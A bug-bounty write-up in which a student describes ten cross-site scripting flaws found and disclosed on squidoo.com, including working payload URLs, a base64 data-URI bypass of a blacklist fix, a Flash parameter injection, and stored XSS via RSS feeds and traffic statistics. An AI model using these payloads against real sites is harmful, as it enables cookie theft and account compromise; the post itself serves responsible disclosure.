Being a student, any opportunity for some extra cash is always a good one to investigate. I stumbled accross the squidoo.com in my twitter feed. I noticed there was cash rewards so I thought it was worth a poke around. I decided to give the application a full testing. In total I found 10 Xss bugs. Which did indeed result in a reward and my name being added to the section of their site.
I'd like to thank squidoo.com for running their bug bounty program as it may encourage others to do the same. It is also a very neat way of showing their users that they care about their safety. They were also very helpful/responsive through the whole disclosure process. In total I received rewards of $1,100 as I reported many fix bypasses/CSRF issues among the Xss below, for which I am Immensely grateful.
Below I list the 10 bugs I found...
1. hq.squidoo.com Open-redirect Xss
2. www.squidoo.com charts.swf Xss
3. magazines.squidoo.com reflective Xss
4. Csrf/Xss www.squidoo.com Lens title
5. www.squidoo.com Xss Rss feed
6. www.squidoo.com Xss Rss feed in Widget
7. www.squidoo.com Xss via Image Link
8. Plupload Xss
9. Traffic Poisoning Xss
10. Forum post Xss
1. hq.squidoo.com Open-redirect Xss
This bug was at the following URL http://hq.squidoo.com/wp-login.php?redirect_to=Malicious_Xss_or_Site Using a value of javascript:prompt%28document.domain,document.cookie%29; you were presented with the expected popup. This was then fixed using a blacklist, which then resulted in a bypass which also needed to be fixed. Using a value of data:text/html;base64,PGlmcmFtZSBvbmxvYWQ9cHJvbXB0KGRvY3VtZW50LmRvbWFpbiwiWHNzIik+ javascript execution was still possible.
2. www.squidoo.com charts.swf Xss
This swf was found in the source of one of the squidoo pages. I found the following information about charts.swf that helped me discover this bug. This bug involved reverse engineering the license key algorithm, as the free version of this product doesn't allow url javascript execution. Using my chartsPOC.xml I was able to replace the content of the swf with my own. You will notice in the xml the javascript in the url element.
This swf bug was located at the following location http://www.squidoo.com/resources/charting/charts.swf?library_path=charts_library&php_source=https://makthepla.net/chartsPOC.xml&license= For obvious reasons, I'm not describing the process of bypassing the license as it is a commercial product. But the licence key was necessary for this bug to work. Upon linking to our malicious swf url a victim would be presented with the following...
Upon clicking anywhere on the screen we get our javascript execution.
3. magazines.squidoo.com reflective Xss
This was simply data from a $_GET parameter being printed on the screen without being sanitized. I can't quite remember how I found this URL... This was at the following location, http://magazines.squidoo.com/images/image.php?src=//%3Ciframe%20onload=prompt%28document.domain,document.cookie%29;%3E
4. Csrf/Xss www.squidoo.com Lens title
For this attack, all our attacker needs is the url of a lens. The lens I used for example was the following http://www.squidoo.com/testing-squidoo-55465. The attacker crafts the following CSRF form that submits to the location http://www.squidoo.com/workshop/ajax_save_title/testing-squidoo-55465. You can see here that the ending of the URL simply matches that of the lens being attacked.
If the attacker gets the owner of the lens to submit this form, the next time they go to edit their lens we get Xss execution because the title html element isn't escaped correctly.
5. www.squidoo.com Xss Rss feed
On squidoo.com there is an option to include a remote RSS blog on your page. If I include the RSS field located at https://makthepla.net/squidooPoc.rss I can get javascript execution via the Xml parameter. You will notice in this feed it is equal to javascript:prompt(document.domain,document.cookie)
The "POC XSS LINK" in blue in the following image is the result. Clicking it results in our Javascript execution.
6. www.squidoo.com Xss Rss feed in Widget
Similar to the bug above, we can also get Xss via in the widget modules.
Clicking the "POC XSS LINK" on the widget located in the bottom right results in our expected popup.
7. www.squidoo.com Xss via Image Link
There is an option to include text/image content on your squidoo page. In the Image inclusion option there is a "Link the photo to this URL" option. Using a link containing the following string data:text/html;base64,PGlmcmFtZSBvbmxvYWQ9cHJvbXB0KGRvY3VtZW50LmRvbWFpbiwiWHNzIik+ in this field or simply javascript:alert(document.domain);
The following is executed as it was base64 encoded. Once the image is clicked, resulting in Xss.
8. Plupload Xss
The site used an old version of plupload that is vulnerable to Xss via the Id parameter. if you accessed the following url http://www.squidoo.com/scripts/squidoo/lib/plupload/plupload.flash.swf?id=0\%22%29%29}catch%28e%29{prompt%28document.domain,document.cookie%29}// You would get the expected javascript execution. This vulnerability was found before I reported it so I wasn't eligible for a reward for this one.
9. Traffic Poisoning Xss
This allows an attacker to poison the Traffic stats for any Lens, resulting in an XSS. First I created a new Lens "Example Lens 2" located at the following url http://www.squidoo.com/example-lens-2?showme Below you can see the empty traffic stats for this Lens, located here http://www.squidoo.com/stats/traffic/example-lens-2
You will notice that under the clickouts there are no values available. So if I visit my page regularly as any user and click on any link or url, I notice that each url is tracked via ajax at the following url. http://www.squidoo.com/track/ajax_click?&lens_id=21343241&url=THE CLICKED LINK In the image below I clicked a link on my page to https://makthepla.net and I notice that in tamper data (A tool used to monitor requests) that this URL is tracked.
I can then view this in the traffic stats page as seen below.
However if I visit the following URL http://www.squidoo.com/track/ajax_click?&lens_id=21343241&url="> (Notice the javascript!) I can store Xss instead of a Url into the victim Lens traffic statistics. An example of what happens when I visit the page now is below.
10. Forum post Xss
This Xss occurred on the hq.squidoo.com forum, it involved finding the location http://magazines.squidoo.com/wp-admin/profile.php I then included some simple proof of concept javascript injection as a forum signature. This was included in every forum post I made. I used a simple vector of confirm(1) to verify it worked. Below you will see the included poc html.
I then made a test post to the forums to confirm it worked. The result can be seen below...
I also made the squidoo admins aware of many csrf bugs but they were aware of these already and were in the process of fixing them. These were also beyond the scope of the bug bounty program. I hope you find this information above interesting. If you are interested in having me test your web application for bugs or common security issues, please contact me via any of these contact points -> https://makthepla.net/contact/